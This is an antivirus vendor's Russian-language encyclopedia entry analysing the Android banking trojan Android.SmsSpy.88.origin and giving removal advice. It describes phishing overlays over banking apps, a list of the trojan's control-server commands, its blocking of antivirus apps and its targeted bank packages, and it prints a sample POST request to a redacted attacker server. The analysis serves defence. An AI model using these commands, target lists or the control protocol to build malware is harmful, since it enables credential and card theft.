Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Android.SmsSpy.88.origin

Добавлен в вирусную базу Dr.Web: 2015-08-26

Описание добавлено:

SHA1:

b607191448d0c31ea7d4a4ce9a0268cc72a23701
c80ce28bae65d06c6855b0e2647f752a3b7c4fbe
18747eaf81daaf51abe76749dc6fa89937e2a6f5

Троянская программа, заражающая мобильные устройства под управлением ОС Android и предназначенная для похищения логинов и паролей от учетных записей мобильного банкинга, а также кражи денег со счетов пользователей. Android.SmsSpy.88.origin распространяется под видом безобидных приложений, например, Adobe Flash Player.

screen #drweb

После запуска троянец запрашивает доступ к правам администратора мобильного устройства:

screen #drweb

Далее он активизирует Wi-Fi-модуль и затем каждую минуту проверяет, активно ли сетевое подключение через Wi-Fi и мобильную сеть оператора. Если эти каналы связи неактивны, вредоносная программа включает их вновь.

Затем троянец передает на управляющий сервер следующую информацию:

  • уникальный идентификатор устройства, сформированный самой вредоносной программой;
  • IMEI-идентификатор;
  • текущий язык системы;
  • название мобильного оператора;
  • версию операционной системы;
  • наименование модели устройства;
  • номер мобильного телефона.

Кража аутентификационной информации

Конфигурационный файл Android.SmsSpy.88.origin содержит список атакуемых банковских приложений, а также ссылки на шаблоны фишинговых окон для этих программ. Например:

  • "com.paypal.android.p2pmobile" – "http://******merti.com/333/l/pl/paypal.php"
  • "de.commerzbanking.mobil" – "http://******merti.com/333/l/de/06.php"
  • "com.ing.diba.mbbr2" – "http://******merti.com/333/l/de/13.php"
  • "de.ing_diba.kontostand" – "http://******merti.com/333/l/de/13.php"
  • "de.fiducia.smartphone.android.banking.vr" – "http://******merti.com/333/l/de/15.php"

Троянец отслеживает запуск пользователем банковских приложений из этого списка, и после того как одно из них начинает работу, показывает поверх его окна соответствующую фишинговую форму. Введенные жертвой логин и пароль затем незаметно передаются на управляющий сервер. Примеры мошеннических окон, которые может показывать Android.SmsSpy.88.origin:

screen #drweb screen #drweb screen #drweb

Кража информации о кредитной карте

Android.SmsSpy.88.origin пытается украсть у пользователя информацию о его кредитной карте. Для этого троянец отслеживает запуск следующих приложений, указанных в его настройках (этот список может незначительно отличаться в зависимости от модификации вредоносной программы):

  • com.android.vending;
  • com.viber.voip;
  • com.whatsapp;
  • com.skype.raider;
  • com.facebook.orca;
  • com.facebook.katana;
  • com.instagram.android;
  • com.android.chrome;
  • com.twitter.android;
  • com.google.android.gm;
  • com.android.calendar;
  • jp.naver.line.android.

После того как одно из этих приложений начинает работу, Android.SmsSpy.88.origin показывает поверх его окна фишинговую форму настроек платежного сервиса Google Play, в котором требуется указать сведения о кредитной карте:

screen #drweb screen #drweb

Введенные пользователем данные затем передаются злоумышленникам.

Выполнение команд

Android.SmsSpy.88.origin может получать от сервера следующие команды:

  • rent&&& – начать перехват всех входящих СМС;
  • sms_stop&&& – остановить перехват всех входящих СМС;
  • sent&&& – отправить СМС-сообщение;
  • ussd&&& – выполнить USSD-запрос;
  • delivery&&& – выполнить рассылку СМС по всем контактам из телефонной книги;
  • apiserver – изменить адрес управляющего сервера;
  • appmass – отправить ММС-сообщение;
  • windowStop – добавить указанное в команде приложение в список исключений, после чего при его запуске не будет показываться фишинговое окно настроек платежного сервиса Google Play;
  • windowStart – удалить заданное приложение из списка исключений;
  • windowsnew – загрузить с сервера обновленный конфигурационный файл со списком атакуемых банков;
  • UpdateInfo – отправить на сервер информацию обо всех установленных на устройстве приложениях;
  • freedialog – отобразить окно WebView c полученным с сервера шаблоном (эта команда используется для активации функции блокировщика экрана);
  • freedialogdisable – отменить показ окна WebView;
  • adminPhone – изменить телефонный номер, с которого могут поступать СМС c дублирующими командами;
  • killStart – установить пароль на ScreenLock;
  • killStop – снять пароль со ScreenLock;
  • upload_sms – отправить на управляющий сервер все СМС-сообщения, сохраненные в памяти устройства;
  • notification – отобразить уведомление с полученными параметрами.

Команды rent&&&, sent&&&, ussd&&&, killStart и killStop могут также поступать троянцу в виде СМС-сообщений, отправляемых злоумышленниками.

После успешного выполнения каждой команды вредоносная программа уведомляет об этом управляющий сервер, отправляя на него POST-запрос вида:


POST  HTTP/1.1 http://******merti.com/333/set_result.php
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Host: ******merti.com
Connection: Keep-Alive
bot_id=**********260a5fc56212793aca5387&result=windowStart+OK

Противодействие антивирусам

Android.SmsSpy.88.origin пытается помешать работе ряда антивирусных программ и сервисных утилит, не позволяя им запуститься. В зависимости от модификации троянца среди этих приложений могут быть следующие:

  • com.cleanmaster.security;
  • com.cleanmaster.mguard;
  • com.piriform.ccleaner;
  • com.cleanmaster.mguard_x86;
  • com.cleanmaster.sdk;
  • com.cleanmaster.boost;
  • com.drweb;
  • com.qihoo.security;
  • com.kms.free;
  • com.eset.ems2.gp;
  • com.qihoo.security.lite;
  • com.symantec.mobilesecurity;
  • com.dianxinos.optimizer.duplay.

Атакуемые банковские приложения

Известные приложения типа «банк-клиент», которые атакует троянец:

  • at.bawag.mbanking
  • at.easybank.mbanking
  • at.spardat.netbanking
  • at.volksbank.volksbankmobile
  • au.com.bankwest.mobile
  • au.com.ingdirect.android
  • au.com.nab.mobile
  • Citibank.CZ
  • com.akbank.android.apps.akbank_direkt
  • com.arkea.android.application.cmb
  • com.arkea.android.application.cmso2
  • com.bankaustria.android.olb
  • com.bbva.bbvacontigo
  • com.bbva.bbvawallet
  • com.bbva.nxt_tablet
  • com.boursorama.android.clients
  • com.cacf.MonCACF
  • com.caisseepargne.android.mobilebanking
  • com.cajamar.Cajamar
  • com.chase.sig.android
  • com.cic_prod.bad
  • com.citi.citimobile
  • com.citiuat
  • com.cm_prod.bad
  • com.comarch.mobile
  • com.commbank.netbank
  • com.CreditAgricole
  • com.db.mm.deutschebank
  • com.discoverfinancial.mobile
  • com.finansbank.mobile.cepsube
  • com.fullsix.android.labanquepostale.accountaccess
  • com.garanti.cepsubesi
  • com.getingroup.mobilebanking
  • com.getingroup.mobilebanking
  • com.groupama.toujoursla
  • com.grppl.android.shell.CMBlloydsTSB73
  • com.grppl.android.shell.halifax
  • com.idamob.tinkoff.android
  • com.infonow.bofa
  • com.ing.diba.mbbr2
  • com.IngDirectAndroid
  • com.isis_papyrus.raiffeisen_pay_eyewdg
  • com.konylabs.CBHU
  • com.konylabs.cbplpat
  • com.lbp.peps
  • com.macif.mobile.application.android
  • com.ocito.cdn.activity.creditdunord
  • com.paypal.android.p2pmobile
  • com.pozitron.iscep
  • com.regions.mobbanking
  • com.starfinanz.mobile.android.dkbpushtan
  • com.starfinanz.smob.android.sbanking
  • com.starfinanz.smob.android.sfinanzstatus
  • com.tmobtech.halkbank
  • com.usaa.mobile.android.usaa
  • com.vakifbank.mobile
  • com.ykb.android
  • com.ziraat.ziraatmobil
  • de.adesso.mobile.android.ga
  • de.adesso.mobile.android.gad
  • de.comdirect.android
  • de.commerzbanking.mobil
  • de.consorsbank
  • de.dkb.portalapp
  • de.fiducia.smartphone.android.banking.vr
  • de.ing_diba.kontostand
  • de.postbank.finanzassistent
  • es.bancopopular.android.lanzadera
  • es.bancosantander.apps
  • es.lacaixa.mobile.android.newwapicon
  • eu.eleader.mobilebanking.pekao
  • eu.eleader.mobilebanking.raiffeisen
  • fr.axa.monaxa
  • fr.banquepopulaire.cyberplus
  • fr.banquepopulaire.cyberplus.pro
  • fr.creditagricole.androidapp
  • fr.lcl.android.customerarea
  • fr.lemonway.groupama
  • mobi.societegenerale.mobile.lappli
  • mobile.santander.de
  • net.bnpparibas.mescomptes
  • net.inverline.bancosabadell.officelocator.android
  • org.banksa.bank
  • org.stgeorge.bank
  • org.westpac.bank
  • pl.bzwbk.bzwbk24
  • pl.bzwbk.mobile.tab.bzwbk24
  • pl.eurobank
  • pl.ing.ingmobile
  • pl.mbank
  • pl.pkobp.iko
  • ru.alfabank.mobile.android
  • ru.mw
  • ru.sberbankmobile
  • ru.vtb24.mobilebanking.android
  • uk.co.tsb.mobilebank
  • wit.android.bcpBankingApp.millenniumPL

Новость о троянце

Рекомендации по лечению


Android

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке